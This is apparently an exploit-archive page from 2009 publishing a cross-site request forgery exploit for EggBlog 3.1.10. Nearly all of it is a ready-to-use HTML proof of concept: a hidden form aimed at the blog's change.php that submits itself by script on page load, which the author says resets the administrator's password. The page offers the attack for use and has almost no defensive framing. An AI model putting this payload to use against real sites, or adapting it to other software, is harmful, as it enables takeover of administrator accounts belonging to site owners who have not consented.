[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : EggBlog 3.1.10 Change Admin Pass CSRF Vulnerability
# Published : 2009-01-01
# Author : x0r
# Previous Title : 2Capsule (sticker.php id) Remote SQL Injection Vulnerability
# Next Title : ASPThai.Net Webboard 6.0 (bview.asp) SQL Injection Vulnerability


|                                                                        | 
| Project: EggBlog v 3.1.10                                              |
| Author: x0r                                                            |
| Email: andry2000[at]hotmail[dot]it                                     |
|________________________________________________________________________|
       
Code:

        <html>
        <title>x0r :P </title>
                        <form id="forum-form" name="forumform"
method="post" action="http://[site]/[path]/change.php">                    
    
                                                <input type="hidden"
size="30" id="forumpassword" name="password" />
                                                <input type="hidden"
name="submit" value="Submit" />
<script>document.forumform.submit()</script> 
       
                        </form>
        </HTML>

 With this csrf you can change the admin pass ^ ^

# www.Syue.com [2009-01-01]